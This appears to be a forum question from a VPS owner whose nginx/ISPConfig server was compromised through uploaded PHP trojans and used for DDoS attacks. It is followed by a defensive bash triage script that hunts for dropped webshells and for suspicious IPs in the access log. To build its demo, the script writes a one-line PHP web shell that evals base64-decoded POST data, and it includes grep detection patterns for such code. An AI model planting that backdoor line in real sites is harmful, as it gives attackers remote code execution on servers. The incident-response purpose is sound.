I got an email from my hosting provider telling me that my VPS was used to perform DDoS attacks on this website: cpanel4.vhosting-it.com. Unfortunately I didn't read their email sooner, so they suspended my account.
Here's the log that they received from the attacked website.
Before reactivating my VPS, I want to know how I can find the shell script used to perform the attack and how the attacker gained access to my VPS. How can I protect my VPS after reactivating it?
I'm using Ubuntu 18.04 + nginx + ISPConfig.
Edit 1:
My hosting provider is waiting for my report explaining the issue and the measures I have taken to prevent similar incidents in the future.
Edit 2: OK, so after regaining access to my VPS, I've found this:
1. nginx can't start; it gives me an error. After checking journalctl I found that ISPConfig went down after a PHP file was uploaded to the upload folder.
2. After logging in to my server through FTP I found that hundreds of PHP files and folders had been created! Essentially it's the same PHP file, renamed and with small modifications in some variables.
3. The index.php file was also modified.
4. Kaspersky marks those PHP files as viruses (Trojan.PHP.Agent.uo).
So what I did is:
1. Removed all those PHP files.
2. Installed Wordfence, ran a scan, then repaired all repairable files and deleted the others.
3. I'll back up my DB and some critical files, then reinstall my VPS.
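As an added example (not part of the original question or of ISPConfig/Wordfence), the shell helpers below show how the triage described in Edit 2 can be done directly on the box before wiping it: list PHP files sitting under an upload directory, grep PHP files for the eval/base64 constructs typical of droppers, list files modified after a reference timestamp, and pull from the nginx access log the client IPs that POSTed to an upload endpoint or called a .php file under an upload path. The web root layout, file contents, log lines and IP addresses are all constructed for the demonstration; point the functions at the real web root and `/var/log/nginx/access.log` instead.

```shell
#!/usr/bin/env bash
# Triage helpers for a PHP dropper found in an upload folder on an nginx host.
# Everything below is a constructed example: the sample tree, file contents
# and access-log lines are made up for demonstration.

# PHP files under an upload directory should never exist; list them.
php_in_uploads() {            # $1 = web root
  find "$1" -type f -iname '*.php' \
       \( -path '*/upload/*' -o -path '*/uploads/*' \) | sort
}

# PHP files containing constructs typical of webshells/droppers:
# eval/assert on decoded data, or request parameters used directly.
# Hits need a manual look: some legitimate plugins also use base64_decode.
suspicious_php() {            # $1 = web root
  grep -rlE 'eval\(|assert\(|base64_decode\(|gzinflate\(|str_rot13\(|\$_(GET|POST|REQUEST)\[' \
       --include='*.php' "$1" | sort
}

# Files modified after a reference file (touch it to the time of the last
# known-good backup). Compare the mtimes with the upload time in the log.
newer_than() {                # $1 = web root, $2 = reference file
  find "$1" -type f -newer "$2" | sort
}

# Client IPs that POSTed to an upload endpoint and got a 2xx response, or
# that requested a .php file under an upload path (i.e. called the shell).
# Field layout is nginx's default "combined" log format.
upload_actors() {             # $1 = access log
  awk '($6 == "\"POST" && $7 ~ /upload/ && $9 ~ /^2/) ||
       ($7 ~ /\/uploads?\/.*\.php/) { print $1 }' "$1" | sort -u
}

# Build the constructed sample: a clean site plus one dropped shell.
build_sample() {
  local root; root=$(mktemp -d)
  mkdir -p "$root/web/upload" "$root/web/wp-content/uploads"
  printf '<?php echo "hello"; ?>\n' > "$root/web/index.php"
  printf '<html>static</html>\n'   > "$root/web/about.html"
  # Backdate the legitimate files and create the backup-time reference.
  touch -t 202001010000 "$root/web/index.php" "$root/web/about.html"
  touch -t 202006090000 "$root/last-good-backup"
  # The dropped file: decodes and evals whatever is POSTed to it.
  printf '<?php eval(base64_decode($_POST["c"])); ?>\n' \
         > "$root/web/wp-content/uploads/shell.php"
  # Constructed nginx access-log lines (RFC 5737 documentation addresses).
  cat > "$root/access.log" <<'EOF'
203.0.113.5 - - [10/Jun/2020:12:00:01 +0000] "POST /upload/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jun/2020:12:00:02 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jun/2020:12:00:03 +0000] "POST /wp-content/uploads/shell.php HTTP/1.1" 200 64 "-" "curl/7.58.0"
198.51.100.7 - - [10/Jun/2020:12:00:04 +0000] "POST /upload/ HTTP/1.1" 403 0 "-" "Mozilla/5.0"
EOF
  echo "$root"
}

# Demo run against the constructed sample.
root=$(build_sample)
echo "PHP files under upload dirs:";  php_in_uploads "$root/web"
echo "Suspicious PHP files:";          suspicious_php "$root/web"
echo "Modified after last backup:";    newer_than "$root/web" "$root/last-good-backup"
echo "Upload actors:";                 upload_actors "$root/access.log"
rm -rf "$root"
```

On the real host, run the functions as a user that can read the web root and the nginx logs, and keep the output (file list, mtimes, source IPs) for the report the provider asked for: the first upload hit in the log and the earliest dropped file together date the compromise, and the IPs are what you block at the firewall. ISPConfig also has its own upload paths, so widen the `-path` globs to match whatever upload directory journalctl pointed at.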